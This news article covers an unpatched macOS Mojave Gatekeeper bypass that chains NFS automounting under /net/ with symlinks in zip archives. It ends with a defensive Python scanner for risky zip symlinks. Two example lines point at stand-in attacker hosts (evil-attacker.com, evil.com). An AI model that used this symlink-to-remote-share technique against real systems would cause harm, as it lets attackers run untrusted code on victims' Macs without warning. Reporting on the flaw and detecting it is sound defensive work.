
Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution

An unpatched vulnerability was recently discovered in macOS 10.14.5, also known as Mojave. The flaw could allow an attacker to execute arbitrary code without the need for user interaction, thus bypassing Gatekeeper.

This discovery comes from researcher Filippo Cavallarin from Segment, an Italy-based cybersecurity company. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote.

How is the Gatekeeper bypass possible?

First, it should be noted that Gatekeeper, by design, accepts both external drives and network shares as safe locations, allowing the apps they contain to run flawlessly. However, by combining two legitimate features of macOS, it is possible to deceive Gatekeeper and its “intended behavior”.

So, what are these features? The first one allows a user to automatically mount a network share by simply accessing a path beginning with “/net/”.

For example,

    ls /net/evil-attacker.com/sharedfolder/

will make the OS read the contents of the ‘sharedfolder’ directory on the remote host (evil-attacker.com) using NFS.

The other feature is that zip archives can contain symbolic links that point to arbitrary locations. Furthermore, the software that decompresses zip files on macOS doesn’t perform any checks on the symlinks before creating them, the researcher explained.

How would an attack work? An attacker could craft a zip file containing a symbolic link to an attacker-controlled automount endpoint (e.g. Documents -> /net/evil.com/Documents) and send it to a targeted system. The user would download the malicious archive and extract the malicious file without suspecting anything.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (e.g. hiding .app extensions and the full path in the title bar) makes this technique very effective and hard to spot, the researcher noted.
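The symlink check that the macOS unarchiver skips can be done before extraction. The following is an added example, not code from the researcher or this article: it lists zip members stored as symbolic links and flags targets that point at the “/net/” automount path, at any absolute path, or outside the archive root. It assumes symlinks are stored with Unix mode bits in the entry's external attributes; the function names and the sample archive (using the reserved host example.invalid) are constructed for illustration.

```python
import io
import posixpath
import stat
import zipfile

AUTOMOUNT_PREFIX = "/net/"  # autofs path named in the article


def classify(name, target):
    """Return why a symlink target is risky, or None if it stays inside the archive."""
    if target.startswith(AUTOMOUNT_PREFIX):
        return "automount path"
    if posixpath.isabs(target):
        return "absolute path"
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(name), target))
    if resolved == ".." or resolved.startswith("../"):
        return "escapes archive root"
    return None


def scan_zip(data):
    """Return [(member, target, reason)] for risky symlink members in zip bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16  # Unix st_mode is in the high 16 bits
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(info).decode("utf-8", "replace")  # link body = target path
            reason = classify(info.filename, target)
            if reason:
                findings.append((info.filename, target, reason))
    return findings


def sample_zip():
    """Constructed sample: an automount link, a benign relative link, a regular file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, target in (("Documents", "/net/example.invalid/Documents"),
                             ("docs/latest", "v1/readme.txt")):
            info = zipfile.ZipInfo(name)
            info.create_system = 3  # Unix
            info.external_attr = (stat.S_IFLNK | 0o755) << 16
            zf.writestr(info, target)
        zf.writestr("docs/v1/readme.txt", "hello")
    return buf.getvalue()


if __name__ == "__main__":
    for member, target, reason in scan_zip(sample_zip()):
        print(f"{member} -> {target}: {reason}")
```

A mail gateway or download quarantine step could run a scan like this and hold any archive that returns findings.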

There’s also a video demonstration of how this Gatekeeper bypass works.

Related: Windows .exe File Bypasses Gatekeeper and Downloads Malware on Macs

This is not the first time macOS's built-in protection, Gatekeeper, has been bypassed. In February this year, Trend Micro security researchers discovered that a malicious Windows .exe file could infect Mac computers and download infostealer malware accompanied by adware onto their systems.

In that case, the .exe files were able to evade Gatekeeper’s protection because they were not checked by the software, which is designed to check only native Mac files. This could lead to bypassing the code signature check and verification.

Milena Dimitrova
